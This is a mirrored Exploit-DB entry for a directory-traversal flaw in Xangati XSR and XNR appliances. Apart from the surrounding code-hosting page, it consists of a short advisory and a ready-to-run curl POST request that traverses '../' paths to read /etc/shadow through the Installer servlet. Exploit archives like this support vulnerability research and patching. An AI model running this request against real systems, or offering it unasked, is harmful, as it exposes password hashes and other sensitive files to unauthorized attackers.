bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/39143.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
634 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/66817/info
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'
Reference in a new issue View git blame Copy permalink